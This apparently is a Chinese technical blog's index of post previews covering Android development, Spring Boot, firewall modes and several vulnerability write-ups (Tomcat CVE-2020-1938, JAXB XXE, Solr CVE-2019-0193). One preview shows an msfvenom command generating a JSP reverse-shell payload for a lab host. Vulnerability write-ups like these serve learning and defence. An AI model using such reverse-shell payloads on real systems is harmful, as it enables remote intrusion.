原创 Android開發系列:4.利用 Android Studio開發看美女應用

4.利用 Android Studio開發看美女應用 今天我們會利用 Android Studio開發一個簡單的看美女應用,通過它查看互聯網上的美女圖片。通過本篇文章,你將會學到Android應用簡單開發,Android權限申請,Andr

原创 Android開發系列:2.使用Android Studio搭建Android開發環境

2.使用Android Studio搭建Android開發環境 本文基於win10,記錄Android Studio開發環境搭建。 2.1下載jdk和Android Studio (1)下載jdk http://www.oracle.co

原创 Android開發系列:1.安卓操作系統架構與應用程序組件

1.安卓操作系統架構與應用程序組件 本文介紹安卓操作系統架構和應用程序基本組件。 1.1安卓操作系統架構 Android是一種基於Linux的自由及開放源代碼的操作系統。而Android系統構架是安卓系統的體系結構,其系統架構和其操作系統

原创 CVE-2020-1938(RCE利用)

CVE-2020-1938(RCE利用) 1.使用msf生成反彈shell馬,並且監聽 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R >

原创 Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938)

Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938) 1.背景 Tomcat是由Apache軟件基金會屬下Jakarta項目開發的Servlet容器,按照Sun Microsystems提供的技術規範,實現了

原创 JAXB血案之 XML外部實體注入漏洞(XXE)

JAXB血案之 XML外部實體注入漏洞(XXE) 開始正文之前,我們的口號是:代碼很有趣,安全很重要。 什麼?你問我累了怎麼辦?自然是看美女了,送福利哈哈。 1.漏洞描述 XML外部實體注入漏洞,即XXE(XML External En

原创 Android開發系列:3.利用Android Studio開發一個demo應用

3.利用Android Studio開發一個demo應用 本文介紹利用Android Studio開發一個demo應用。 3.1創建第一個demo應用 (1)Create New Project (2)Configure your p

原创 Apache Solr 遠程命令執行漏洞(CVE-2019-0193)

Apache Solr 遠程命令執行漏洞(CVE-2019-0193) 聲明:本篇文章僅限用於學習信息安全技術,請勿用於非法途徑! 1.漏洞描述 2019年8月1日,Apache Solr官方發佈了CVE-2019-0193漏洞預警,漏洞

原创 Apache Tomcat任意文件讀取漏洞和命令執行漏洞源碼分析(CVE-2020-1938)

Apache Tomcat任意文件讀取漏洞和命令執行漏洞源碼分析(CVE-2020-1938) 環境準備 在分析Apache Tomcat源碼漏洞之前,我們先需要使用Idea配置Tomcat源碼,請參考:https://blog.csdn

原创 Spring Boot之旅

Spring Boot之旅 Spring Boot是由Pivotal團隊提供的全新框架,其設計目的是用來簡化新Spring應用的初始搭建以及開發過程。該框架使用了特定的方式來進行配置,從而使開發人員不再需要定義樣板化的配置。通過這種方式,

原创 Tomcat的DefaultServlet和JspServlet

Tomcat的DefaultServlet和JspServlet Tomcat在/conf/web.xml中默認定義了兩個Servlet,DefaultServlet和JspServlet。該web.xml對於所有tomcat加載的的we

原创 AndroidStudio上傳代碼到gitee

AndroidStudio上傳代碼到gitee 1.註冊gitee 既然要使用gitee,那就要先註冊gitee的賬號,鏈接如下: https://gitee.com/ 2.下載git並配置 http://npm.taobao.org/m

原创 透明模式與路由模式

透明模式與路由模式 1. 透明模式 透明模式:對用戶是透明的,即用戶意識不到防火牆的存在。接口無法配置IP地址,唯一IP地址配置在Management 接口,用於設備的管理。用於2層網絡的安全隔離。控制同一局域網內部安全訪問。 流量轉發: